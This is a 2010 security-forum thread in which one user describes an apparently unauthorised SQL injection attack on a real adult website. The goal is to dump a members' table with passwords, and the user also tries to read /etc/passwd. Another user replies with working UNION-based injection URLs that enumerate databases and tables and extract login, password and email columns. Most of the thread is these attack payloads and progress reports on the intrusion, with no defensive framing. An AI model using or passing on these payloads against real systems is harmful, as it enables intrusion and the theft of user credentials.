 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Can't display columns in tables |
 |
 Posted: Wed Oct 06, 2010 9:17 am |
 |
|
| RubberDoll |
| Active user |
 |
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
 |
|
 |
|
Hello again
I started an injection on a site.
First thing is the basic test didn't expose number of colums, only displayed 2 error messages and 1 missed image
| Code: | | http://site.com/show.php?type=model&id=82+order+by+20-- |
| Quote: | warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/path/to.site.com/htdocs/show.php on line 6
|
However,
| Code: | | http://site.com/show.php?type=model&id=82+order+by+1-- |
did not give any errors, so I just increased the numbers, and found it was 6 columns without errors
I found the vulnerable column by trial and error, and was able to find database user, the database name and mysql version 5.0.51B-LOG
| Code: | http://site.com/show.php?type=model&id=-82+union+all+select+1,concat(table_name,char(58),column_name),3,4,5,6+from+information_schema.columns--
|
| Quote: | | CHARACTER_SETS:CHARACTER_SET_NAME |
I used group_concat and found in the page source the list, but not completed
so I decided to first get all table names only, and found checking the source page again, a table name which I believe to be my goal
but now, whatever I do to display the columns from that table, I get the first error ( with the path ).
in fact, I couldn't view any other tables's columns besides information_schema.columns but that is not a complete list so I don't see the columns in the table I'm interested..
I don't have permission to read files as well, I tried loading /etc/passwd with no result . It deforms the page but nothing in the source..
My questions
How to make the injection show all the rest of the tables/columns in information_schema.columns ?
or maybe a trick to see the columns from the table I am after?
well, I'd love to know both ways :)
Thank you. |
|
|
|
|
|
|
|
|
| Posted: Tue Oct 12, 2010 10:36 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
solved 
it only took me a week 
but here is the next problem in the same site:
after I've checked the table I wanted, it turned out not to be the members' table, and in fact I didn't find any table with members passes or any other infos
the information I got since my first try on this site is
user: MEMBERSxxxx@LOCALHOST
database: MEMBERSxxxx
now, I can't wrap my mind around this concept..
shouldn't I be able to see the tables in this database like so:
show.php?type=model&id=-82+union+all+select+1,(table_name),3,4,5,6+from+membersxxxx--
and another question, please.
could I, and how, see a list of available databases for this site?
please : )
Thank you |
|
|
|
|
|
|
|
|
| Posted: Tue Oct 12, 2010 5:40 pm |
|
|
| pink_spider |
| Advanced user |
 |
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
Hi (:
everything good?
I think you should first try to attack the 'schemata'
the 'information_schema' and then proceed with the attack until the end!
| Code: | | http://site.com/show.php?type=model&id-82+union+(select+1,Group_concat(Concat_Ws(0x5c,schema_name)),3,4,5,6+from+information_schema. schemata-- |
I hope I have helped you!
Contact: Pink_spider79@hotmail.com |
|
|
|
|
| Posted: Tue Oct 12, 2010 5:40 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
Hi (:
everything good?
I think you should first try to attack the 'schemata'
the 'information_schema' and then proceed with the attack until the end!
| Code: | | http://site.com/show.php?type=model&id-82+union+(select+1,Group_concat(Concat_Ws(0x5c,schema_name)),3,4,5,6+from+information_schema. schemata-- |
I hope I have helped you!
Contact: Pink_spider79@hotmail.com  |
|
|
|
|
|
|
|
|
| Posted: Wed Oct 13, 2010 8:54 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Thank you pink_spider
unfortunately not. just an error with path disclose
what does this string mean anyway? (I mean, what info I was supposed to get)
Thanks again
p.s.
you also missed a closing parenthese I think
| Code: | | (select+1,group_concat(concat_ws(0x5c,schema_name))) |
but sadly, that didn't work either..
| pink_spider wrote: | Hi (:
everything good?
I think you should first try to attack the 'schemata'
the 'information_schema' and then proceed with the attack until the end!
| Code: | | http://site.com/show.php?type=model&id-82+union+(select+1,Group_concat(Concat_Ws(0x5c,schema_name)),3,4,5,6+from+information_schema. schemata-- |
I hope I have helped you!
Contact: Pink_spider79@hotmail.com |
|
|
|
|
|
| Posted: Wed Oct 13, 2010 9:40 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
ok.. I figured it out. looked up 'schemata' in google.
alas, no good news for me. no users with plaintext passes table |
|
|
|
|
|
|
|
|
| Posted: Wed Oct 13, 2010 6:10 pm |
|
|
| pink_spider |
| Advanced user |
|
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
Oh sorry ):
sure the code would be:
| Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6 from information_schema.schemata)-- |
or
| Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6) from information_schema.schemata-- |
You can use the 'schemata' to know the names of 'db'
instance: db_name: waraxe.us
You go and explore this table to get the logins and passwords
users of the forum.
| Code: |
http://waraxe.us/sql.php?id=-1 and (Select 1,group_concat(CONCAT_WS(0x5c,login,password,email)),3,4,5,6 from waraxe.us.users-- |
this is not what most interresa ):
try this code! and then post it here if it worked. \ Õ /
| Code: | | http://site.com/show.php?type=model&id=-82+union+(select+1,GROUP_CONCAT(table_name),3,4,5,6)+From+INFORMATION_SCHEMA.TABLES+where+table_schema=database()-- |
I have helped this time (y)
|
|
|
|
|
|
|
|
|
| Posted: Thu Oct 14, 2010 9:05 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Hello again, pink_spider
What makes you think it's a forum? it's not. it's just an adult site ;)
Thank you for trying to further help, but I already solved the matter yesterday, and was able to find out which databases exist on that site.
However your help didn't go in vain because I found out about schemata. so thanks again :)
oh and I tried because you wanted to know about the last code you posted
no. nothing found.
| pink_spider wrote: | Oh sorry ):
sure the code would be:
| Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6 from information_schema.schemata)-- |
or
| Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6) from information_schema.schemata-- |
You can use the 'schemata' to know the names of 'db'
instance: db_name: waraxe.us
You go and explore this table to get the logins and passwords
users of the forum.
| Code: |
http://waraxe.us/sql.php?id=-1 and (Select 1,group_concat(CONCAT_WS(0x5c,login,password,email)),3,4,5,6 from waraxe.us.users-- |
this is not what most interresa ):
try this code! and then post it here if it worked. \ Õ /
| Code: | | http://site.com/show.php?type=model&id=-82+union+(select+1,GROUP_CONCAT(table_name),3,4,5,6)+From+INFORMATION_SCHEMA.TABLES+where+table_schema=database()-- |
I have helped this time (y)
:oops: |
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 90
Members: 0
Total: 90
